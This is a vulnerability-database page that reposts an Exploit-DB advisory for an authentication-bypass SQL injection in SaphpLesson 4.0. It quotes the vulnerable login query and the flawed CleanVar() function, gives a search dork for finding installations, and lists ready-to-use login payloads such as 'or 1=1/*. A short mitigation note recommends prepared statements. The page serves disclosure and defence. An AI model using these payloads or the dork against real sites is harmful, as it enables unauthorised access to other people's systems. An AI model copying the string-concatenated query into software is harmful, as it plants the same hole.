SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability

vendor:

SaphpLesson

by:

SwEET-DeViL

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: SaphpLesson

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: NO

Related CWE: N/A

CPE: a:saphplesson:saphplesson:4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability

SaphpLesson v4.0 is vulnerable to an authentication bypass vulnerability due to the lack of input validation in the CleanVar() function. An attacker can exploit this vulnerability by sending malicious input to the username and password fields in the login page. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be implemented to ensure that only valid data is accepted by the application. Additionally, the application should use prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

---------------------------------SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability---------------------------------------
                       #                                                                            
   #    ####     #    ###      ##   ###  ####  ####  ###   #####   ####  ####   ###     #    ### ####  ######
   ##    #  #    ##    # #    # #  #  #   # #   #  #  #    #  #   #    #  # #  #  #     ##    #   # # #  #  #
   # #   #  #    # #   # #    # #  #      #     #  #   #   #  #  #        #    #        # #   #   #      #   
  #  #   ###    #  #   ###   #  #   ##    ###   ###    #  #   #  #        ###   ##      #  #  #   ###    #   
  ####   #  #   ####   #  # ######    #   #     #  #    # #   #  #        #       #     #   # #   #      #   
 #   #   #   # #   #   #  #     # #   #   #     #   #   ##    #   #    #  #   #   #     #    ##   #      #   
##    #####   ##    ######     ### ###   ####  ###   #   #   ###   ####  ####  ###   # ###    #  ####   ###  


#----------------------------------------------------------------------------------------------------------------
Script : SaphpLesson
version : 4.0
Language: PHP
Site: http://www.saphplesson.org
Download: http://www.saphplesson.org/saphplesson.zip
Dork: intext:Powered by SaphpLesson 4.0
Found by: SwEET-DeViL

need magic_quotes_gpc = Off

#----------------------------------------------------------------------------------------------------------------

)=> admin/login.php
.................................................................................................................
if ($_SERVER["REQUEST_METHOD"]=="POST"){
          $username = CleanVar($_POST["cp_username"]); <======================================{
          $password = md5(CleanVar($_POST["cp_password"]));
          $IsLogin    = $db->get_var("select count(*) from modretor Where  ModName='".$username."' and ModPassword='".$password."'");

.................................................................................................................

function  of insecure !!

)-)=> includes/functions.php
---------------------------------------
.[106] function CleanVar($var)
.[107] {
.[108]     (get_magic_quotes_gpc() === 0) ? $var : addslashes($var);
.[109]
.[110]     return htmlspecialchars(trim($var));
.[111] }
---------------------------------------

#Exploit:

username : 'or 1=1/*
OR 
username : 'or 1=1 or '
OR 
username : admin ' or ' 1=1--
....

password: SwEET-DeViL

---------------------------------------


/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
||          SwEET-DeViL & viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/

# milw0rm.com [2009-07-24]